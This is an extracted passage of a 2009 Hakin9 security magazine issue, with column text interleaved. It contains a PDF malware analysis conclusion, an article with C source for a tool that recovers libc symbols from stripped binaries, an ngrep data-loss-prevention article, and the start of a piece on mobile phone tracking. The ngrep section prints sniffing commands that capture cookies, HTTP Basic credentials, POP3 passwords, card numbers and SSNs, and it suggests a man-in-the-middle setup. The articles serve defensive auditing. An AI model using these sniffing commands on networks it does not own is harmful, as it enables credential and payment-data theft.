RichMedia entries by searching for /EF
in the object streams. You'll find 2 files:
fancyBall.swf (object 2) and oneoff.swf
(object 3). Extract the file content with pdf-
parser and dump it with swfdump (http:
//www.swftools.org). If you understand
ActionScript bytecode, you'll see that
fancyBall.swf contains the exploit and
oneoff.swf the heap spray and shellcode
(Figure 13).

Conclusion
When you obtain a suspicious PDF
document, first analyze it with PDFiD. Or
better yet, submit it to VirusTotal, with the
Figure 12. Decompressed Object Streams piped through PDFiD
added benefit of having it scanned by
40+ anti-virus engines. If it gets detected
by several anti-virus engines, you know
the document is malicious. If it doesn't get
detected, read the PDFiD report. It will tell
you if the PDF document contain elements
that indicate possible malicious intend.
If you decide that it's probably
malicious, start to analyze it with
pdf-parser. Search for JavaScript or
ActionScript, extract the scripts and
analyze them.

Didier Stevens
Didier Stevens is an IT Security professional specializing
in application security and malware. Didier works for
Contraste Europe NV. All his software tools are open
Figure 13. ActionScript heap spray and shellcode source.

54 HAKIN9 6/2009
DEFENSE
JUSTIN SUNWOO KIM

Recovering
Debugging Symbols
From Stripped Static Compiled Binaries

Difficulty

I first started to look into symbol recovery to better solve various


war-games with stripped binaries. However, this can be applied to
various areas.

M
any malware have been stripped to Debugging Symbols?
prevent from analyzing them and the Debugging symbols are information stored in
method described would enhance the compiled binary for better debugging a process.
process of debugging those malware and many It usually contains variable names, function
other stripped binaries. The method I use in this names, and offsets of the symbols. Symbols can
article will merely reflect other signature finding be checked by various commands including
methods such as FLIRT. Also this article will be objdump, gdb, and nm. Figure 1 is a screenshot
based on finding libc functions in ELF binary format. of using gdb on a binary that includes debugging
You will learn how lost debugging symbols can be symbols. As you can see, when the main function
recovered through signature matching. calls another function, the name of the function

WHAT YOU WILL


LEARN...
How lost debugging symbols
can be recovered through
signature matching

WHAT SHOULD YOU


KNOW...
Knowledge on C, assembly Figure 1. Disassembly of ELF binary with debugging symbols

56 HAKIN9 6/2009
DEBUGGING

being called is printed next to its address.


Listing 1. The binary through objdump
With these symbols, we can easily locate
more information about the functions. 080681b0 <strcpy>:
Using objdump will also help us in the 80681b0: 55 push %ebp
80681b1: 31 d2 xor %edx,%edx
same way as gdb. Now nm command
80681b3: 89 e5 mov %esp,%ebp
is the one we will become familiar with. 80681b5: 56 push %esi
It lists out all the symbols written in the 80681b6: 8b 75 08 mov 0x8(%ebp),%esi
binary with various options, including its 80681b9: 53 push %ebx
80681ba: 8b 5d 0c mov 0xc(%ebp),%ebx
location, offset, size, index, and much
80681bd: 8d 4e ff lea -0x1(%esi),%ecx
more. 80681c0: 0f b6 04 13 movzbl (%ebx,%edx,1),%eax
80681c4: 88 44 11 01 mov %al,0x1(%ecx,%edx,1)
libc Library 80681c8: 83 c2 01 add $0x1,%edx
80681cb: 84 c0 test %al,%al
Libc library is standard C library 80681cd: 75 f1 jne 80681c0 <strcpy+0x10>
developed by GNU. It provides numerous 80681cf: 89 f0 mov %esi,%eax
functions for us to easily program in the 80681d1: 5b pop %ebx
80681d2: 5e pop %esi
C language on Linux, including strcpy,
80681d3: 5d pop %ebp
memcpy, printf, and etc. I assume that 80681d4: c3 ret
most of you know it already. So why am
I talking about libc? In this document,
I am trying to explain a way to locate
libc functions in a stripped static binary.
However, this methodology can also be
applied to other libraries.

������������

�������� �����

�������
������������ ������
������

�����



�������
������
������
�����
������

������� �

������������ Figure 4. nm result of ELF binary

Figure 2. Dynamically Linked ELF binary

���������������

�������� �����

�������
������������ ������
������

�����
������ �

������ �
�������
������
������
�����
������

������� �

������������

Figure 3. Static Linked ELF binary Figure 5. Disassembly of stripped ELF binary

6/2009 HAKIN9 57
DEFENSE
Static Compile
So what is static compile? Most compilers
by default use a dynamic linker to link a
binary to a library function to avoid putting
all the different function codes into one
binary file. Let's say that we are running
a simple hello world code with the printf
function. Regular dynamic compiled binary
has a link to glibc for the printf reference.
However, if the binary is statically compiled,
the binary would refer to its own version
of printf located in its own file, therefore
also having a much more reliable
dependency. Perhaps (see Figure 2 and
Figure 3) would help to better understand
the difference between Dynamic link and
static compiled.
Figure 6. Completely stripped binary
nm
As introduced earlier, nm is a very useful
tool for finding symbols and their related
information. We need to be familiar with
this to better understand the process of
what we are about to do in this document,
because we will be parsing and gathering
the offset and size of the symbols provided
by nm. Figure 4 is an example usage of
nm. If you take a look, you can see the
address of the symbol’s location in the
first column. There are symbol types in the
second column. Lastly, you can see the
names of the symbols in the third column.
There are many symbol types. But to just
cover the ones shown below, T means it
resides in the text area. W means it’s a
weak symbol and R means it’s read-only.
Figure 7. Assembly of printf function
You can find more meanings of these
representations in nm’s manpage (manual).

Stripping a Binary
Stripping simply removes all the
debugging symbols presented in the
binary file. Stripping can be done by a strip
command, usually located at /usr/bin/
strip. After stripping a binary, we no longer
see what we used to see before. Figure
5 is a dump of assembly codes without
debugging information. Although you
might recognize printf in the dump, that
is only a reference of where the function
is located. Notice @plt+0x99 after printf,
which means it is located 0x99 bytes
far from where printf is located. Also a
completely stripped binary would look like
Figure 8. Pattern Generator For Hara shown in Figure 6.

58 HAKIN9 6/2009
DEBUGGING

Listing 2a. pgfh.c

#define _GNU_SOURCE char buf[PATTERN_BUF_SIZ];


#include <stdio.h> char buf2[PATTERN_BUF_SIZ];
#include <link.h> char patternbuf[PATTERN_BUF_SIZ];
#include <string.h> char filebuf[PATTERN_BUF_SIZ];
#include <sys/stat.h> char *funcAddr;
char ch;
#include "func.h"
int funcSize;
#define PATTERN_BUF_SIZ 1024 int readSize;
#define NM_PATH "/usr/bin/nm" int funcOffset;
#define GCC_PATH "/usr/bin/gcc" int compiled;
#define OBJ_PATH "/usr/bin/objdump" int found;
#define ADDRESS_BASE 0x8048000
#define CFILENAME ".pg.c" FILE *fp;
#define EFILENAME ".pg" FILE *sp;
#define HFILENAME "pattern.h" FILE *hp;
#define MAX_ARG 6
#define PATTERN_SIZ 25 struct stat statbuf;

#define TEMPL_INCLUDE "#include <stdio.h>\n#include /* Header prints */


<stdlib.h>\n#include <unistd.h>\ printf("============== Pattern Generator For HARA
n#include <string.h>\n#include <sys/ v1.0 ==============\n");
types.h>\n#include <sys/socket.h>\n" printf("[=] automatic pattern generator for hara\
#define TEMPL_HEADER "int main(){" n");
#define TEMPL_FOOTER "}" printf("[=] z0nKT1g3r @ WiseguyS\n");
printf("[=] http://0xbeefc0de.org\n");
#define HEADER_HEADER "#ifndef __HARA_PATTERN_H__\n#define
__HARA_PATTERN_H__\n\n/* libc library /* Initialize variables for pattern matching */
functions pattern list */\n/* created if(dl_iterate_phdr(find_libcaddr, NULL)<0){
with Pattern Generator for Hara */\n\ printf("[-] Could not locate libc.\n");
nchar *pattern[]={\n" exit(-1);
#define HEADER_FOOTER "#endif" }

//global variables printf("[=] ---------------------------------\n");


void *libcAddr;
char *libcPath; /* Variable infos */
printf("[+] libc library path: %s\n", libcPath);
int checkPattern(char *buf1, char *buf2, size_t n); printf("[+] libc library address: %p\n",
libcAddr);
static int find_libcaddr(struct dl_phdr_info *info, size_t
size, void *data){ nFunc=sizeof(funcList)/4;
char buf[9]; printf("[+] Number of functions to check: %d\n",
nFunc);
//if it's libc module, store info
if(strstr(info->dlpi_name, "libc")){ printf("[=] ---------------------------------\n");
//stores the address
sprintf(buf, "%08x", info->dlpi_addr); //write pattern.h header
sscanf(buf, "%x", &libcAddr); hp=fopen(HFILENAME, "w+");
fprintf(hp, HEADER_HEADER);
//stores the path
libcPath=malloc(strlen(info->dlpi_ //go through the function list
name)+1); for(i=0;i<nFunc;i++){
strcpy(libcPath, info->dlpi_name);
/* gets NM offsets and the function
} address, and function size on libc */
return 0; sprintf(buf, "%s -D -S %s | /bin/grep
} %s", NM_PATH, libcPath, funcList[i]);

int main(int argc, char **argv){ sp=popen(buf, "r");


int i,j,k; funcAddr=0;
int r; for(j=0;!feof(sp);j++){
int nFunc=0; buf2[j]=fgetc(sp);
int nTotal=0; if(buf2[j]=='\x0a'){
int pos; //file pos sscanf(buf2,"%x %x %c %s",
&funcOffset, &funcSize, &ch, &buf);

6/2009 HAKIN9 59
DEFENSE
Listing 2a. pgfh.c

//check the //write file


function name fwrite(filebuf, 1,
strlen(filebuf), fp);
if(checkPattern(buf, funcList[i],
strlen(funcList[i])+1)==0){ fclose(fp);
funcAd
dr=libcAddr+funcOffset; //statically compile
//gcc -o EFILENAME CFILENAME
if(funcSize>PATTERN_BUF_SIZ) -static
sprintf(buf, "%s -o %s
funcSize=PATTERN_BUF_SIZ-100; %s -static 2>/dev/null", GCC_PATH,
break; EFILENAME, CFILENAME);
} system(buf);
//if not, reset
j=0; //if binary exists, break;
else{ if(stat(EFILENAME,
j=0; &statbuf)>=0){
} compiled=1;
} break;
}
}//end of for: feof }//for j<MAX_ARG

pclose(sp); //if not compiled, next function


if(compiled==0){
//if can't find in NM, next function //clean up
if(funcAddr==0) sprintf(buf, "/bin/rm -rf
continue; %s", CFILENAME);
system(buf);
//clean up previous continue;
sprintf(buf, "/bin/rm -rf %s", }
EFILENAME);
system(buf); //find the start of func: objdump
sprintf(buf, "/bin/rm -rf %s", sprintf(buf, "%s -S %s | grep %s",
CFILENAME); NM_PATH, EFILENAME, funcList[i]);
system(buf); sp=popen(buf, "r");
found=0;
for(j=0;j<MAX_ARG;j++){ for(j=0;!feof(sp);j++){
compiled=0; buf2[j]=fgetc(sp);
if(buf2[j]=='\xff')
//write C into file continue;
fp=fopen(CFILENAME, "w+"); if(buf2[j]=='\x0a'){
buf2[j]=0;
//construct file
strcpy(filebuf, TEMPL_ memset(buf,0,PATTERN_BUF_SIZ);
INCLUDE); r=sscanf(buf2,"%x
strcat(filebuf, TEMPL_ %x %c %s", &funcAddr, &funcSize, &ch,
HEADER); &buf);
strcat(filebuf, "\n");
strcat(filebuf, funcList[i]); if(buf[0]!=0 &&
strcat(filebuf, "("); r==4 && ch!='W'){
//
for(k=0;k<j-1;k++){ check the function name
if(j==1)
if(sprintf(buf2,"__%s",funcList[i])
strcat(filebuf, "0"); && checkPattern(buf, buf2,
else strlen(buf2)+1)==0){

strcat(filebuf, "0,"); funcOffset=funcAddr-ADDRESS_BASE;


}
found=1;
strcat(filebuf, "0);\n");
strcat(filebuf, TEMPL_ break;
FOOTER); }
strcat(filebuf, "\n");
else if(sprintf(buf2,"__libc_

60 HAKIN9 6/2009
DEBUGGING

Listing 2c. pgfh.c

%s",funcList[i]) && checkPattern(buf, readSize=PATTERN_BUF_SIZ-100;


buf2, strlen(buf2)+1)==0){
if(fread(buf, 1, readSize,
funcOffset=funcAddr-ADDRESS_BASE; fp)==readSize){
fprintf(hp,"\"%s\",", buf2);
found=1;
fprintf(hp,"\"");
break; for(j=0;j<readSize;j++){
} //print it in \x form
else fprintf(hp,"\\
if(sprintf(buf2,"_IO_%s",funcList[i]) x%02x", (unsigned char)buf[j]);
&& checkPattern(buf, buf2, }
strlen(buf2)+1)==0){
fprintf(hp,"\",");
funcOffset=funcAddr-ADDRESS_BASE; fprintf(hp, "\"%d\",\n",
readSize);
found=1; }

break; fclose(fp);
}
//clean up
else if(sprintf(buf2,"_IO_file_ sprintf(buf, "/bin/rm -rf %s",
%s",funcList[i]) && checkPattern(buf, EFILENAME);
buf2, strlen(buf2)+1)==0){ system(buf);
funcOffset=funcAddr-ADDRESS_BASE; sprintf(buf, "/bin/rm -rf %s",
found=1; CFILENAME);
system(buf);
break; memset(buf, 0, PATTERN_BUF_SIZ);
} memset(buf2, 0, PATTERN_BUF_SIZ);
else nTotal++;
if(sprintf(buf2, "%s", funcList[i])
&& checkPattern(buf, buf2, }//end of for: funcList
strlen(buf2)+1)==0){
fprintf(hp, "\"t1g3r\",\"http://0xbeefc0de.org\",
funcOffset=funcAddr-ADDRESS_BASE; \"10\"};\n\n");
fprintf(hp, HEADER_FOOTER);
found=1; fprintf(hp, "\n");

break; free(libcPath);
}
fclose(hp);
memset(buf2, 0, PATTERN_BUF_SIZ);
j=-1; //clean up previous
} sprintf(buf, "/bin/rm -rf %s", EFILENAME);
}//end of if: 0x0a system(buf);
//printf("feof?:%d\ sprintf(buf, "/bin/rm -rf %s", CFILENAME);
n",feof(sp)); system(buf);
}//end of for: feof
pclose(sp); printf("[=] ---------------------------------\n");
printf("[+] Total %d patterns generated in %s\n",
//if none found, next function ++nTotal, HFILENAME);
if(found!=1) }
continue;
//compares two bytes and returns 0=true, -1=false
printf("[+] %s as %s\n", funcList[i], int checkPattern(char *buf1, char *buf2, size_t n){
buf2); int i;
for(i=0;i<n;i++){
//copy and save(or print) if(buf1[i]!=buf2[i]){
//open EFILENAME and grab the copy return -1;
fp=fopen(EFILENAME, "r+"); }
fseek(fp, funcOffset,SEEK_SET); }
readSize=funcSize; return 0;
readSize=PATTERN_SIZ; }

if(readSize>PATTERN_BUF_SIZ)

6/2009 HAKIN9 61
DEFENSE
Function patterns own unique assembly codes. Therefore, we want. For example, Figure 7 would be
So what can be considered as a function matching those assembly codes in the the opcodes of the printf function in a
pattern? All of the functions have their binary file would surely get us the result static file.

Listing 3. func.h

#ifndef __HARA_FUNC_H__ "free",


#define __HARA_FUNC_H__
//sockets
/* libc library function list */ "accept",
"connect",
char *funcList[]={ "bind",
//str* "send",
"strcpy", "recv",
"strlen", "listen",
"strcat", "htonl",
"strcmp", "htons",
"strncmp", "inet_aton",
"strstr", "inet_ntoa",
"strchr", "sendto",
"strrchr", "recvfrom",

//io
"read", "dup",
"scanf", "dup2",
"sscanf",
"fscanf", //threads, fork
"vscanf", "fork",
"vsscanf", "pthread_create",
"vfscanf",
"getc", //others
"gets", "bzero",
"open", "sleep",
"time",
"puts",
"write", "getuid",
"printf", "setuid",
"sprintf", "getgid",
"snprintf", "setgid",
"vprintf", "geteuid",
"vfprintf", "seteuid",
"vsprintf",
"vsnprintf", "atoi",
"rand",
"close", "srand",
"execl",
//files "execle",
"fopen", "execlp",
"fwrite", "execv",
"fread", "execve",
"fgetc", "execvp",
"fclose",
"fflush", "isupper",
"feof", "isspace",
"fputs", "islower",
"isalpha",
//mem* "toUpper",
"memcpy",
"memset", };
"memcmp",
"mmap",
"mprotect", #endif

//*alloc
"malloc",
"calloc",
"realloc",

62 HAKIN9 6/2009
DEBUGGING

Listing 4. hara.c

#define _GNU_SOURCE if(checkPattern(buf, buf2 ,4)!=0){


#include <stdio.h> printf("[-] File is not ELF binary.\
#include <link.h> n");
#include <string.h> fclose(fp);
#include <sys/stat.h> exit(-1);
#include "pattern.h" }
#define PATTERN_BUF_SIZ 1024 fclose(fp);
#define NM_PATH "/usr/bin/nm" }
#define ADDRESS_BASE 0x8048000 printf("[=] -------------------------------\n");
int checkPattern(char *buf1, char *buf2, size_t n); nFunc=sizeof(pattern)/12;
printf("[+] Number of functions to check: %d\n",
int main(int argc, char **argv){ nFunc);
int i,j,k; printf("[+] Searching through the binary..\n");
int nFunc=0; printf("[=] --------------------------------\n");
int nTotal=0; //open the binary file
int pos; //file pos fp=fopen(argv[1], "r");
fflush(fp);
char buf[128]; //go through the function list
char buf2[128]; for(i=0;i<nFunc;i++){
char patternbuf[PATTERN_BUF_SIZ];
char filebuf[PATTERN_BUF_SIZ]; rewind(fp);
char *funcAddr;
char ch; //get pattern size
int funcSize; readSize=atoi(pattern[i*3+2]);
int readSize;
int funcOffset; /* get the pattern from db */
memcpy(&patternbuf, pattern[i*3+1],
FILE *fp; readSize);
FILE *sp;
/* compare it to file */
struct stat statbuf; pos=0;
struct passwd *pwd;
//loop through the file
/* Header prints */ while(fread(&filebuf, 1, readSize,
printf("================ HARA v1.0 =========\n"); fp)==readSize && !feof(fp)){
printf("[=] libc function locator for statically //compare it to the binary
compiled binaries\n"); if(checkPattern(&patternbuf,
printf("[=] z0nKT1g3r @ WiseguyS\n"); &filebuf, readSize)==0){
printf("[=] http://0xbeefc0de.org\n"); nTotal++;
//perhaps address conversion
//check for the argument pos+=ADDRESS_BASE;
if(argc<2){ printf("[+] Found
printf("[-] Argument Missing.\n"); %s() at %p.\n", pattern[i*3], pos);
printf("[-] [USAGE] %s FILE\n", argv[0]); break;
exit(-1); }
} pos++;
//check if the file exists fseek(fp, pos, SEEK_SET);
else if(stat(argv[1], &statbuf)<0){ }//end of while: fread
printf("[-] File does not exist.\n"); }//end of for: pattern
exit(-1); fclose(fp);
} printf("[=] --------------------------------\n");
//check if it's elf file printf("[=] Total %d functions found.\n", nTotal);
else{ return 0;
fp=fopen(argv[1], "r+"); }
if(fp<=0){ //compares two bytes and returns 0=true, -1=false
printf("[-] Cannot open the file\n"); int checkPattern(char *buf1, char *buf2, size_t n){
exit(-1); int i;
} for(i=0;i<n;i++){
fread(buf, 4, 1, fp); if(buf1[i]!=buf2[i]){
return -1;
//if \x7f written directly, it's }
considered [delete] key }
strcpy(buf2, "aELF"); return 0;
buf2[0]='\x7f'; }

6/2009 HAKIN9 63
DEFENSE
Surely we can go through most of It will first look up functions located in the this by looking at the binary through
the functions one by one generating libc.so.6 file. In doing so, it will use the nm objdump (see Listing 1).
them. However, due to the difference of command to look up if a function exists So the signature will look somewhat
each library and version, it would not be in the current libc library. As soon as it like following.
so efficient to have one pattern set from checks the existence of the function, it will
a system that would be different from try to compile a source code using the “\x55\x31\xd2\x89\xe5\x56\x8b\x75\
other systems. So it would be better to function inside the code. After the code x08\x53\x8b\x5d\x0c\x8d\x4e\xff\
write an automatic pattern generator gets compiled, the generator will look x0f\xb6\x04\x13\x88\x33\x11\x01\
to generate patterns based on its up the function location (offset) by using x83\xc2\x01\x84\xc0\x75\xf1\x89\
own libraries installed on the system. the nm command again in the compiled xf0\x5b\x5e\x5d\xc3”
There is also a problem that different binary. Then by subtracting 0x08041000,
statically compiled binaries will have which is the start of the text area of an The length of this signature can be
slightly different codes of libc functions, ELF binary, to the offset, it will be able modified to enhance the detection of the
it is due to the fact that each static to figure out what the actual location of library function. However, the basic idea of
compiled binaries will have a different the function is. Then, it copies the exact the signature is to compare it to the actual
set of functions, which will have different number of bytes on that address and binary to locate the function in the binary.
function offsets. Although it would be saves it in the pattern list file. After the
ideal to compare the entire function to automatic function pattern generator Hara v0.1
the binary, due to that reason, we would finishes, the actual pattern matching will In this article, I am releasing my own code
have to generate a function pattern for occur. The implementation of the pattern for Hara v0.1. It will also be hosted at http:
only the first 20-30 bytes. matching program will simply compare //code.google.com/p/hara-z/ for open
the pattern to the binary file, and will source development. So anyone is more
Implementation Symbol convert the offset of the function to the than welcome to contribute if you have any
Recovery Tool actual location of the binary by adding brilliant ideas for this project.
The implementation of a recovery tool 0x08041000, to figure out the actual pgfh.c (see Listing 2) is Pattern
will consist of two parts: an automatic location of the function in the target Generator For Hara that creates patterns
function pattern generator and a function binary file. for the functions listed in func.h (see Listing
pattern match program. Implementation For example, to detect strcpy function 3), hara.c (see Listing 4) is the actual code
of the automatic function pattern from the binary, signature of strcpy that will compare the patterns to a target
generator can be broken into few steps. function needs to be generated. We do binary file.
Figure 8 and Figure 9 are the running
screen of pattern generator and hara.
On The 'Net
• http://en.wikipedia.org/wiki/Debug_symbol Further Ideas
• http://en.wikipedia.org/wiki/Executable_and_Linkable_Format It would be better implemented if we
could skip a few bytes after each jump
instruction, because as stated earlier
different codes that are statically compiled
contain a different number of functions,
which will affect the offsets of each
function.

Conclusion and Credits


Please feel free to send me any kind of
feedback at wantstar@0xbeefc0de.org.

Justin Sunwoo Kim


UCLA Computer Science major
http://0xbeefc0de.org
Figure 9. Hara v1.0 2009. 4. 16.

64 HAKIN9 6/2009
3 easy ways to subscribe:
1. Telephone
Order by phone, just call:
1-917-338-3631

2. Online
Order via credit card just visit:
www.hakin9.org/en
3. Post or e-mail
subscription_support@hakin9.org

Hakin9 ORDER FORM


□Yes, I’d like to subscribe to Hakin9 magazine Payment details:
from issue □ □ □ □ □ □ □ USA $49 □ Europe 39€ □ World $49
1 2 3 4 5 6 I understand that I will receive 6 issues over the next 12 months.
Credit card:
Order information □ Master Card □ Visa □ JCB □ POLCARD □ DINERS CLUB
(□ individual user/ □ company) Card no. □□□□ □□□□ □□□□ □□□□ □□□□
Title Expiry date□□□□ □□ Issue number
Name and surname □□□
Security number

address
□ I pay by transfer: Nordea Bank
IBAN: PL 49144012990000000005233698
SWIFT: NDEAPLP2
postcode Cheque:
tel no.
email □ I enclose a cheque for $ ____________________
(made payable to Software Press Sp. z o.o. SK)
Date
Signed

Company name Terms and conditions:


Tax Identification Number Your subscription will start with the next available issue. You will
receive 6 issues a year.
Office position
Client’s ID*
Signed**
DEFENSE
Simple DLP
JOSHUA MORIN

Verification Using
Network Grep
Difficulty

Today, companies have to worry about espionage and battling


internal threat of confidential information being stolen or leaked.

T
he demand to implement and deploy network other methods. Also, DLP can be very complex
equipment and software for DLP increases depending on your network infrastructure.
every year. How do you know if your network Although network grep has traditionally been
is safe? How do you know if your configurations are a tool for debugging communication of plain text
set properly to prevent data loss? protocols, it'salso perfect for verifying if you have
This article will actually show simple implemented the correct systems or standards
techniques for obtaining information or checking for PCI compliance,best security practices, and
possible data leakage. It works by residing on general pen testing use.
a network and lurking over network traffic using
network grep for auditing purposes. Installation And Deployment of
Network grep is a pcap-aware tool that Network Grep
associates with libpcap and will allow you to Most Linux/UNIX operating systems and Win32
utilize regular or hexadecimal expressions to support network grep. In this article I will be using
match against data payloads found in packets. If BackTrack 4 Beta. In BackTrack 4 and Ubuntu based
it discovers a match you can specify the tool to flavors ofDebian Linux you can install network grep
dump into a file for analysis. by using terminal and apt-get install ngrep.
Network grep currently recognizes IPv4/6, Network grep is designed to match patterns
TCP, UDP, ICMPv4/6, IGMP and Raw across of traffic passing over a network interface. This
Ethernet, PPP, SLIP, FDDI, Token Ring and null means to successfully capture and analysis
interfaces. Network grep can be downloaded at packets you should setup for Man In The Middle
Sourceforge.net. (MITM) type scenarios for best results.
Data Loss Prevention (DLP) is a system that
WHAT YOU WILL supposedly can identify, monitor, and protect data Basic Usage Scenario
LEARN... in use, data in motion, and data at rest. These From the shell or command prompt by typing #
An accessible method of systems have been designed to detect and ngrep -h the tool will list all of the available features
checking any possibility of data
loss using a ordinary tool for risk
prevent the unauthorized use and transmission (see Figure 1). This article will only focus on the
minimization. of confidential information. The primary goal is to options as stated in Figure 1 and move onto more
prevent confidential information to go outside the advanced features that can be accessible to the tool.
WHAT SHOULD YOU
company security perimeter (a company employee A recommended list of features to first get
KNOW...
sends a document with confidential data to a comfortable with network grep:
You should have a general
understanding of grep unapproved e-mail address). As you know this
or network grep with a can be difficult and network grep is not the only • -q is be quiet (don't print packet reception
comprehension of regular
expressions.. solution for verification, as it only complements hash marks)

66 HAKIN9 6/2009
• -d is use specified device (index) # ngrep -q -d eth0 cookie "tcp port 80"
instead of the pcap default
• -w is word-regex (expression must You could use network grep to capture all
match as a word) outbound traffic like HTTP requests from
• -O is dump matched packets in pcap a particular machine.
format to pcap _ dump
#ngrep -t '^(GET|POST) ' 'src host
Simple HTTP Usage 12.13.14.15 and tcp and dst port 80'
Scenarios
Network grep can do basic pattern The caret (^) instructs ngrep to only look at
matching via HTTP (port 80) by listening the beginning of the HTTP packets payload.
and communicating with a web server/ As indicated above, the (...|...) will
website. This can be accomplished by match either GET or POST message types.
using the following options: You can use Network grep for basic
HTTP login authorization defined in
# ngrep -q -d eth0 hakin9 “tcp port 80” RFC2617 section two by doing the following:

Network grep will now sniff the wire looking # ngrep -q -d eth0 -i
for packets that contain hakin9 on port 'Authorization: Basic' 'port 80'
80 via HTTP.To complete this process you
can open up your browser and navigate Other Protocol Usage
to hakin9.org for basic pattern matching Scenarios
(see Figure 2). Network grep can do things Internet protocols like POP3 originally
like search for cookies or Session ID's. supported only unencrypted login
Cookies are sent from a server to a client mechanism and plain text transmission
and commonly used for authentication or of passwords which still commonly
tracking. Session ID's are used to identify a occurs today. POP3 does currently
user and can be used to maintain certain support several authentication methods
purchases in e-commerce environments. and you shouldimplementedthem for
Below is a simple way for retrieving packets best security practices. The following
that which the contents contain cookie in example will report all USER or PASS
them from Myspace.com (see Figure 3). commands issued by POP3 clients:

Figure 1. A basic list of tool options


DEFENSE
# ngrep -q -d eth0 "USER|PASS" port 110 The defined expression matches major
credit cards including Visa (length 16, prefix Resources
Users could also use ngrep for other clear 4), Mastercard (length 16, prefix 51-55), • http://ngrep.sourceforge.net/
text based protocols like SMTP, FTP, and Discover (length 16, prefix 6011), American • http://regexlib.com/
Telnet. Express (length 15, prefix 34 or 37). All 16 • http://www.linux.com/archive/articles/
digit formats accept optional hyphens (-) 46268
Credit Card and Social between each group of four digits.
Security Usage Here is a use case of the credit card ?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}" \
Network grep could be used for gathering type expression with network grep which -O /tmp/CC.dump
credit card transaction information by is then saved it into a packet dump for
using more complex expressions like this: analysis. Looking for social security numbers:

^((4\d{3})|(5[1-5]\d{2})|(6011))- # ngrep -q -d eth0 \ #ngrep -q -d eth0 -w '[0-9]{3}\-[0-


?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}$ -w "((4\d{3})|(5[1-5]\d{2})|(6011))- 9]{2}\-[0-9]{4}'

Simple Threat Detection


Now that you can see the power of
network grep, its not uncommon for users
to utilize it to identify and analyze certain
traffic created by worms, viruses, zombies,
and fuzzed/anomalous data.
Below is a simple method for doing
this by analysis of Storm worm executable
names which can be expanded.

#ngrep -q -d eth0 -i '(ecard|postcar


d|youtube|FullClip|MoreHere|FullVi
deo|greeting|ClickHere|NFLSeasonTr
acker).exe' 'port 80'

Network grep does not reconstruct


data streams, it has no ability to match
strings that are broken across two or
Figure 2. Basic pattern matching more packets. If you want to detect
malicious strings hidden across multiple
small packets its best to use detection
mechanisms like SNORT.

Conclusion
Anyone that has familiarity with regular
grep and can understand basic pattern
matching, could pick up and run network
grep, because its very simple and requires
a minimal learning curve. Wrapping
network grep up in automated scripts and
or attached to a cron job can be useful for
routine checks and balances.

Joshua Morin
Joshua Morin is a Security Strategist for Codenomicon,
Ltd., a provider of preemptive security and robustness
test solutions. He is responsible for security analysis and
research in products and service which reveal public, new
and undisclosed threats in the realm of Internet, VoIP, and
IPTV. His work spans from field-oriented Proof of Concept
(PoC) work, robustness testing, security architecture design,
and information security research. He is also a member
Figure 3. Packets that match „Cookie” of the Midnight Research Labs Boston (MRLB).

68 HAKIN9 6/2009
ID fraud expert says...
A Look at How the Mobile
Phone Opens the Door to
Location (LBS) Tracking,
Proximity Marketing and
Cybercrime
JULIAN EVANS

A Brief History of Mobile There are three basic tracking cell identification and signal strength. The
Time methods. The first tracking method mobile will also check whether it has a
The very first public commercial mobile involves the network. Tracking is achieved GPS module installed. The location data
phone network was ARP network in Finland through either cell identification (using of the mobile is then sent to a location
which was launched as far back as 1971. EMEI and/or IMSI identification) or the server. This approach more or less only
Then a few years later the first generation most accurate – triangulation. Another works on the latest of smartphones, i.e.
mobile cellular network was launched deciding factor regarding network Symbian S60, Windows Mobile, iPhone
by Bell Labs in Chicago in 1978, with the accuracy is the dependence on the and Google Android operating systems.
second generation (2G) appearing in concentration of cellular base stations, The final tracking method is the
1991 in Finland (nothing to do with Nokia with urban areas usually achieving the Hybrid based approach. This uses a
of course). Then in 2001, NTT of Japan highest concentration. combination of the network and mobile
introduced the most advanced cellular The second tracking method is approach for location determination,
network to date, the 3G network which Mobile based. This involves installation referred to in mobile circles as Assisted
allowed for greater bandwidth for internet of client software on the mobile phone GPS, which means it uses both GPS
access and use of bandwidth hungry to determine its location. This current and network information to calculate the
mobile applications. The future is mobile, in technique involves a number of cellular location. Hence, you can see how
fact so much more so that anyone could computations on the mobile, which include this approach is the most accurate of
have imagined back in the 1970s.

Fact
There are more mobile handsets (1.05
billion, 2008) in the world than computers
(1 billion, 2008) however smartphones
only account for 13% of the global market.
(Tomi Ahonen's Almanac 2009)

Mobile Phone Tracking


Mobile phone tracking isn’t a new concept;
in fact mobile phones have been tracked by
the mobile phone operators using cellular
triangulation, EMEI (handset identification)
and IMSI (SIM card identification) numbers
and GPS since the advent of the second
generation mobile cellular network. In recent
times this has also included Wi-Fi, where
GSM or GPS is not available. The focus of
my discussion will be around developments
in the US, which is leading the way with
location-based tracking. Figure 1. Mobile Malware Trends

70 HAKIN9 6/2009
HOW THE MOBILE PHONE OPENS THE DOOR

the three. This latter approach is what is network (their mobile phone operator) and can change it, is considered a criminal
leading some marketing agencies and obviously with the appropriate service (or offence. Surprisingly this isn’t the case in
Cybercriminals to believe that this may software application). the US.
well lead to quite different but financial Blackberry was one of the first mobile
rewarding opportunities. phone manufacturers to market GPS- Google Latitude
enabled mobile phones in the US. The Google for obvious reasons is one of the
Fact Blackberry is of course unique for its pioneers of mobile triangulation, or shall
To locate a mobile phone, it must emit email delivery mechanism which is used we say mobile phone tracking as can be
at least the roaming signal to contact by corporate and governments alike, seen with Google Maps. Google Latitude
the next nearby antenna tower, but the but then Blackberry along with Motorola however is one of their more recent
process does not require an active call. started to market the GPS-enabled phones innovations and looks most interesting of
Most antennas can currently locate a to consumers. In 2009 we now see a all it doesn’t require any GPS technology.
mobile device within 50 meters. proliferation of devices with GPS enabled Simple put Latitude works by checking
and a number of tracking services are now Google Maps on a phone and looks for
How the Tracking Method available to mobile phone manufacturers, say your best friend, and assuming their
has Developed in the US operators and software developers. mobile phone is switched on it locates
It’s really only since 11 September 2001, Of increasing significance is that fact your friend at home. It doesn’t however
with the demand for e911 (which calls for that Wi-Fi complements the mobile phone use mobile triangulation, which would be a
enhanced emergency calling capabilities), infrastructure, by providing an access major privacy concern for most users. So
that has really pushed the notion of GPS point for location based data to pass in this event, the actual threat from snoops,
tracking technology in mobile phones. In through the Internet gateway. You are proximity marketers and hackers is next
addition, many GPS-equipped phones probably aware that each mobile phone to zero for now. Of course, most people
have two settings: 911-only or location-on. has a unique identifier (called an IMEI*) suspect Google will want to cooperate
In the US, at the end of 2005 all mobile and if enabled, can pass this information, with the mobile phone operators. It may
